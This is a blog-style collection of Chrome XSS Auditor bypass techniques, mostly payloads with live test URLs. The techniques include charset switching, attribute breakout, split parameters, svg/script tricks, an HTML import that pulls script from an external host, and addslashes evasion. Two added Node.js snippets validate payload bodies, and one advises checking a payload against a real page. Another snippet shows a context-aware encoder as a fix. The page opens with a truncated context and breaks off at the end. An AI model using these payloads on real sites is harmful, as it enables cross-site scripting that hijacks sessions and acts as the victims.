
Browser security / Chrome XSS Auditor bypass

Date: 2022-07-16 07:38:52


context (only the first line of this context survived, the start of a PHP heredoc):

$html = <<<str

test:

http://mhz.pw/game/xss/charset.php?xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E

Decoded: <meta charset=ISO-2022-JP><svg onload\x1B(B=alert(1)>. The injected <meta> switches the document to ISO-2022-JP, in which ESC ( B (%1B%28B) is the switch-to-ASCII escape sequence. The decoder consumes it, so the parsed attribute is plain onload=alert(1), while the raw request string still carries the escape bytes in the middle of the attribute name.

Output inside an attribute value (here the alt of an <img>), with a <script> further down the page

context:

<img alt="">
<script> y = "abc"; </script>

payload (decoded from the test URL below):

xss="><script/src=data:,alert(document.domain)+"

The payload closes the alt attribute, opens <script/src=...> with an unquoted src value and never closes it: the page's own </script> a little further down ends the element, which is the moment a <script src> runs. Because the reflection sits directly in front of the page's own closing quote, the src value the tokenizer produces is data:,alert(document.domain)+"" rather than the literal string that appears in the request.

test

http://mhz.pw/game/xss/beforescript.php?xss=%22%3E%3Cscript%2Fsrc%3Ddata%3A%2Calert(document.domain)%2B%22

Two output points

context:

<?php
// Echo the value of parameter one
echo "This is text1:".$_GET['text1']."
";
// Echo the value of parameter two
echo "This is text2:".$_GET['text2']."
";
?>

payload:

http://xxx/chrome.php?text1=<script>alert(/XSS/);void('&text2=')</script>

http://xxx/chrome.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>

Neither parameter on its own contains a complete script: text1 opens <script> and a string literal, text2 closes both. The page's own output between the two reflections (everything up to and including "This is text2:") ends up inside the void('...') or document.write('...') literal, so the inline script body the browser finally executes is not a substring of any single reflected parameter. For this to parse, the swallowed markup must contain no raw line break and no single quote.

test

http://mhz.pw/game/xss/doubleout.php?text1=%3Cscript%3Ealert(/XSS/);void(%27&text2=%27)%3C/script%3E

Chrome 43 XSSAuditor bypass

Roughly every version before -06-23 works.

context = any

payload:

xss=<svg><script>/<1/>alert(document.domain)</script></svg>

Inside <svg> the <script> element is foreign content rather than raw text, and "<1/>" is not a tag (a tag name cannot begin with a digit), so it stays in the script body as text. The body /<1/>alert(document.domain) is valid JavaScript: the regular-expression literal /<1/ compared with > against the return value of alert(document.domain).

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cscript%3E/%3C1/%3Ealert(document.domain)%3C/script%3E%3C/svg%3E
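Added example (not from the original page): a Node.js check that the script bodies produced by the two-output-point and Chrome 43 payloads above are valid JavaScript, and that in the two-output case the body is not contained in any single request parameter. The rendered bodies are reconstructed by hand from the contexts on this page; the separator between the two reflections is an assumption, since the page only shows a line break there. alert and document are stubbed, so nothing runs against a real page.

```javascript
// Added example, not from the original page. Checks, in Node.js, that the
// script bodies the HTML parser ends up handing to the JS engine are valid
// JavaScript. alert() and document are stubbed, so nothing is executed
// against a real page.

// Static markup assumed to sit between the two reflections (an assumption:
// the real separator is unknown, the page only shows a line break there).
const SEPARATOR = "<br>This is text2:";

// Script bodies as the browser sees them, reconstructed by hand from the
// contexts above.
const RENDERED_BODIES = {
  doubleOutputVoid: "alert(/XSS/);void('" + SEPARATOR + "')",
  doubleOutputWrite: "alert(/XSS/);document.write('" + SEPARATOR + "')",
  // Inside <svg>, "<1/>" is not a tag (a tag name cannot start with a digit),
  // so it survives as text and the body is a regex literal compared with ">".
  chrome43Regex: "/<1/>alert(document.domain)",
};

// Decoded query parameters of the doubleout.php test URL above.
const DOUBLE_OUTPUT_PARAMS = {
  text1: "<script>alert(/XSS/);void('",
  text2: "')</script>",
};

// true if `body` parses as a JavaScript program (compiled, never run).
function compiles(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    return false;
  }
}

// Does any single request parameter contain the whole inline script body?
// A filter that compares each reflected parameter with the rendered script
// one at a time only matches when this is true.
function bodyWithinOneParam(body, params) {
  return Object.values(params).some((v) => v.includes(body));
}

// Run a body with alert() and document stubbed; returns what alert received.
function runWithStubs(body) {
  const calls = [];
  const fakeDocument = { domain: "mhz.pw", write: () => {} };
  new Function("alert", "document", body)((x) => calls.push(String(x)), fakeDocument);
  return calls;
}

// The void('...') trick needs a separator the JS lexer accepts inside a
// single-quoted literal: a raw line break or a ' in the static HTML between
// the reflections turns the body into a syntax error.
function separatorUsable(separator) {
  return compiles("alert(/XSS/);void('" + separator + "')");
}

for (const [name, body] of Object.entries(RENDERED_BODIES)) {
  console.log(name, compiles(body) ? "valid JS" : "syntax error", runWithStubs(body));
}
```

separatorUsable is the check to run before trying the two-output payload against a real page: paste in the static HTML that sits between the two reflections and see whether the resulting literal still parses.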

Chrome 36~40: <link rel=import> bypass

Fixed on Oct 10, . (In fact it still existed at the start of the following year.)

/p/chromium/issues/detail?id=421166

/bugs/wooyun--090304

The bypass comes from <link rel=import> pulling in an external HTML document: the reflected markup the Auditor inspects is just the <link> tag, while the scripts of the imported document run against the importing page. (HTML Imports were later removed from Chrome altogether, in Chrome 80.)

context = any

payload

xss=<link rel=import href=https://auth.mhz.pw/game/xss/link.php>

test

http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3Dimport%20href%3Dhttps%3A%2F%2Fauth.mhz.pw%2Fgame%2Fxss%2Flink.php%3E

Output inside a string in a <script>

If the string can be closed, just close it and write JavaScript, e.g.:

http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27

But what if the single quote cannot be closed? Take this context:

<html>
<head>
<meta charset="utf-8">
<title>all</title>
<script type="text/javascript">
var a = '<?php echo addslashes($_GET["xss"]); ?>';
</script>
</head>
<body>
123
</body>
</html>

payload (decoded from the test URLs below):

</script><svg><script>alert(1)+&apos;

</script><svg><script>alert(1)//

addslashes() only escapes ' " \ and NUL, so </script> and the entity &apos; pass through untouched. The first </script> ends the page's own script element (its body, var a = ', is a harmless syntax error). The <script> inside <svg> is foreign content, where character references are decoded, so its body alert(1)+&apos;'; reaches the JS engine as alert(1)+''; and runs. The second variant comments the trailing '; out with //.

test

http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)%2b%26apos%3B

http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)//
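Added example (not from the original page): a Node.js comparison of PHP-style addslashes() with a context-aware encoder for the var a = '...' slot above. It renders the page template with each encoder, counts how many </script> end tags the result contains, and round-trips the hardened output through the JS parser to show the value survives intact. The template string and the two payloads are copied from this section; the encoder and helper names are my own.

```javascript
// Added example, not from the original page. Compares addslashes() with a
// context-aware encoder for a value written into a JavaScript string literal.

// PHP addslashes(): a backslash before ' " \ and NUL, nothing else. It does
// not touch < > / or &, so "</script>" and "&apos;" pass straight through.
function addslashes(s) {
  return s.replace(/[\\'"\0]/g, (c) => "\\" + c);
}

// Encoder for the slot  var a = '...';  inside a <script>. Every code unit
// outside a small safe set becomes \uXXXX, which the JS lexer turns back into
// the original character while the HTML tokenizer never sees a < / & or quote.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9 ,.:_-]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// The context from this section, with the encoder as a parameter.
function render(encoder, xss) {
  return '<script type="text/javascript">\nvar a = \'' + encoder(xss) + "';\n</script>";
}

// Number of </script> end tags in the rendered HTML. The template contributes
// exactly one; anything more means the injection ended the script element.
function scriptEndTags(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// What the JS engine reads out of the literal. Uses the JS parser itself, so
// \u escapes are interpreted exactly as a browser would.
function readBack(encoder, xss) {
  return new Function("return '" + encoder(xss) + "';")();
}

// Payloads from the two scriptaddslashes.php tests above.
const PAYLOADS = [
  "</script><svg><script>alert(1)+&apos;",
  "</script><svg><script>alert(1)//",
];

for (const p of PAYLOADS) {
  console.log("addslashes:", scriptEndTags(render(addslashes, p)), "end tag(s)");
  console.log("encoded   :", scriptEndTags(render(encodeForJsString, p)), "end tag(s)");
}
```

The PHP equivalent of encodeForJsString is json_encode($x, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT), emitted without surrounding quotes since json_encode supplies its own; the point is that the encoder must be chosen for the slot the value lands in (a JS string inside HTML), not for the string-escaping rules of the server language.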

A generic bypass when there is a controllable upload point

context:

The site's domain has an upload point under my control, so I can upload a .txt, .js or similar file (anything that is not a media file works; if the upload check is a blacklist, any made-up extension will do). Then I reference it from the src attribute of a <script> tag. The Auditor treated a script src on the document's own host without a query string as a likely-safe resource, so a same-origin upload path is never flagged. Two caveats on the browser side: Chrome refuses to run a script served with an image, audio, video or text/csv MIME type, and a response carrying X-Content-Type-Options: nosniff is only executed as a script if its MIME type is a JavaScript type, which closes this hole for uploads served as text/plain or application/octet-stream.

payload

xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E

test

http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E

http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.ayu%3E%3C/script%3E

JSON Encode

context

$_GET['x'])?>
